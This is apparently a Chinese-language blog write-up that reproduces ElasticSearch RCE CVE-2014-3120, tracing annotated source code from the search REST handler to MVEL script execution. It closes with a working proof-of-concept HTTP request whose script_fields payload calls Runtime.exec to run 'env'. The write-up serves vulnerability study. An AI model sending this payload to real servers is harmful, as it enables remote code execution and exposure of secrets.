ElasticSearch RCE(CVE-2014-3120)

前言

参考披露的报告复现

  • 漏洞类型:RCE

  • 影响版本:ElasticSearch < 1.2.0

漏洞复现

漏洞代码

通过源码审计发现,该漏洞的核心问题在于默认配置下 script.disable_dynamic 参数为 false,导致动态脚本功能完全开放

1
2
3
4
5
6
7
// ElasticSearch 1.1.x 版本中 ScriptService.java 的关键代码
if (settings.getAsBoolean("script.disable_dynamic", false)) {
    // 如果配置禁用动态脚本
} else {
    // 默认启用动态脚本功能
    registerScriptEngine(MvelScriptEngineService.class);
}

利用链

请求入口:TransportSearchAction.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// elasticsearch/src/main/java/org/elasticsearch/rest/action/search/RestSearchAction.java

/**
 * 处理客户端发送的搜索 REST 请求
 * 将请求体中的 JSON 内容解析为搜索源,构造 {@link SearchRequest},
 * 通过 client 异步执行搜索,并在成功时将响应通过 REST channel 返回给客户端
 *
 * @param request  REST 请求,包含搜索查询的 JSON 源
 * @param channel  REST 通道,用于向客户端发送响应
 */
public void handleRequest(final RestRequest request, final RestChannel channel) {
    // 创建一个新的搜索请求对象,后续将填充索引、类型、搜索源等信息
    SearchRequest searchRequest = new SearchRequest();
    
    // 将 REST 请求体中的 JSON/Map 内容直接设置为搜索请求的 source
    // 该 source 通常包含 query、size、from、aggregations 等搜索定义
    searchRequest.source(request.content());
    
    // 通过 client 异步执行搜索
    client.search(searchRequest, new ActionListener<SearchResponse>() {
        @Override
        public void onResponse(SearchResponse response) {
            // 搜索成功,构建一个 HTTP 200 OK 响应,并将 SearchResponse 作为响应体发送
            channel.sendResponse(new BytesRestResponse(OK, response));
        }
    });
}

脚本解析:QueryParseContext.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
// elasticsearch/src/main/java/org/elasticsearch/index/query/QueryParseContext.java

/**
 * 从 XContent 解析器当前的位置读取一个脚本对象,并构建对应的 {@link Script} 实例
 * 预期当前 token 为 {@link XContentParser.Token#START_OBJECT},且对象内包含 "script" 和可选的 "lang" 字段
 *
 * @param parser XContent 解析器,当前位置应在脚本对象的起始大括号处
 * @return 解析得到的脚本对象,脚本类型为 {@link ScriptType#INLINE},语言和参数均为可选
 * @throws IOException 如果在解析过程中发生 I/O 错误
 */
public Script parseScript(XContentParser parser) throws IOException {
    // 确保当前解析器处于对象开始位置,才能正确解析脚本字段
    if (parser.currentToken() == XContentParser.Token.START_OBJECT) {
        String script = null; // 用于存储脚本内容
        String lang = null;   // 用于存储脚本语言

        // 循环读取对象内的所有字段,直到遇到 END_OBJECT
        while ((token = parser.nextToken()) != XContentParser.Token.END_OBJECT) {
            // 根据当前字段名决定读取的内容
            if ("script".equals(parser.currentName())) {
                script = parser.text(); // 获取脚本内容
            } else if ("lang".equals(parser.currentName())) {
                lang = parser.text();   // 获取脚本语言
            }
        }
        
        // 使用解析到的脚本内容和语言构造内联脚本
        // 脚本类型固定为 INLINE,未设置参数(params 为 null)
        return new Script(script, ScriptType.INLINE, lang, null);
    }

脚本执行引擎初始化:ScriptService.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
// elasticsearch/src/main/java/org/elasticsearch/script/ScriptService.java

/**
 * 构造 ScriptService,负责管理脚本引擎的注册与动态脚本的安全策略
 *
 * @param settings      集群级别设置,用于读取脚本相关配置,如 {@code script.disable_dynamic}
 * @param scriptEngines 已注册的脚本引擎映射表,按语言名称索引
 */
public ScriptService(Settings settings, Map<String, ScriptEngineService> scriptEngines) {
    // 读取全局开关:是否完全禁用动态脚本(即通过请求传入的内联脚本)
    // 若设置为 true,则所有内联脚本都将被拒绝,无论语言;默认 false 表示允许动态脚本
    this.disableDynamic = settings.getAsBoolean("script.disable_dynamic", false);
    
    // 只有当全局允许动态脚本时,才预注册常用的脚本引擎
    // 这些引擎用于解析和执行对应语言的内联脚本
    if (!disableDynamic) {
        // 默认启用 MVEL 脚本引擎(Elasticsearch 早期版本默认脚本语言,后续被 Painless 取代)
        registerScriptEngine(MvelScriptEngineService.class);
        // 注册 Groovy 脚本引擎,支持 Groovy 语法的动态脚本
        registerScriptEngine(GroovyScriptEngineService.class);
    }
    // 注意:此处未显示 scriptEngines 参数的使用,实际实现中可能将传入的引擎合并到内部注册表中
    // 并且还可能注册其他引擎,如 Painless、Expression 等
}

/**
 * 检查指定语言的动态脚本是否被允许
 * 判断逻辑为:先看全局禁用开关,再检查该语言的单独配置
 *
 * @param lang 脚本语言标识,如 "groovy"、"mvel"、"painless" 等
 * @return true 如果允许执行该语言的内联动态脚本,false 表示禁止
 */
private boolean isDynamicEnabled(String lang) {
    // 全局禁用动态脚本时,直接拒绝所有语言的动态脚本
    if (disableDynamic) {
        return false;
    }
    // 按语言粒度进行细粒度控制,配置项格式:script.<lang>
    // 例如 script.groovy: false 表示单独禁用 Groovy 动态脚本
    // 未配置时默认为 true,即允许
    return settings.getAsBoolean("script." + lang, true);
}

MVEL脚本引擎实现:MvelScriptEngineService.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
// elasticsearch/src/main/java/org/elasticsearch/script/mvel/MvelScriptEngineService.java

/**
 * MVEL 脚本引擎服务实现
 * 负责提供基于 MVEL 表达式的脚本编译和执行功能
 */
public class MvelScriptEngineService implements ScriptEngineService {
    
    /**
     * 直接执行一段 MVEL 脚本字符串
     * 该方法在每次调用时都会对脚本进行解析和执行,适用于一次性执行场景,
     *
     * @param script 待执行的 MVEL 表达式或脚本代码
     * @param vars   执行脚本时可访问的变量映射(如文档字段值、参数等)
     * @return 脚本执行结果
     * @throws ScriptException 如果脚本解析或执行过程中发生错误
     */
    @Override
    public Object execute(String script, Map<String, Object> vars) {
        try {
            // 直接调用 MVEL.eval() 一步完成解析与执行
            // 参数 vars 为变量上下文,脚本中可以直接引用其中的键作为变量名
            return MVEL.eval(script, vars);
        } catch (Exception e) {
            // 将 MVEL 引擎的异常包装为统一的 ScriptException,方便上层统一处理
            throw new ScriptException("failed to execute script", e);
        }
    }
    
    /**
     * 将脚本预编译为可重复执行的 {@link ExecutableScript} 对象
     *
     * @param script 脚本对象,包含脚本源码(通过 getIdOrCode() 获取)和类型等信息
     * @param vars   编译时可以绑定的初始变量(注意:实际变量值在执行时才传入)
     * @return 封装了编译结果的可执行脚本
     */
    @Override
    public ExecutableScript executable(Script script, Map<String, Object> vars) {
        // 使用 MVEL 编译表达式,生成可序列化的编译结果
        // compileExpression 会对表达式进行语法解析并生成优化的内部表示
        Serializable compiled = MVEL.compileExpression(script.getIdOrCode());
        
        // 创建可执行脚本实例,将编译结果和变量绑定传入
        // 注意:vars 在此处作为初始上下文被保存,实际执行时脚本可能会动态修改这些变量
        return new MvelExecutableScript(compiled, vars);
    }
}

/**
 * MVEL 编译后脚本的可执行封装
 * 持有编译后的表达式树以及执行时的变量上下文
 * 每次调用 {@link #run()} 时基于绑定的变量计算结果
 */
class MvelExecutableScript extends ExecutableScript {
    /** 编译后的 MVEL 表达式,可被高效地重复执行 */
    private final Serializable compiled;
    /** 脚本执行时的变量映射,可在执行前通过 setNextVar 等方法更新 */
    private final Map<String, Object> vars;
    
    /**
     * 构造一个可执行的 MVEL 脚本
     *
     * @param compiled 编译后的表达式对象(来自 MVEL.compileExpression)
     * @param vars     初始变量上下文
     */
    public MvelExecutableScript(Serializable compiled, Map<String, Object> vars) {
        this.compiled = compiled;
        this.vars = vars;
    }
    
    /**
     * 运行脚本,对编译表达式进行求值
     * 使用当前绑定的变量上下文执行编译后的表达式树
     *
     * @return 表达式计算结果
     */
    @Override
    public Object run() {
        // 通过 MVEL.executeExpression 执行预编译的表达式
        // vars 可包含文档字段值、参数等,运行时直接引用
        return MVEL.executeExpression(compiled, vars);
    }
}

缺陷分析:

  • 无沙盒机制:MVEL 引擎直接执行任意代码

  • 无权限控制:脚本可访问所有 Java 类和方法

  • 无输入过滤:script.getIdOrCode() 直接传递给 MVEL 编译器

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /_search?pretty HTTP/1.1
Host: host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"env\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}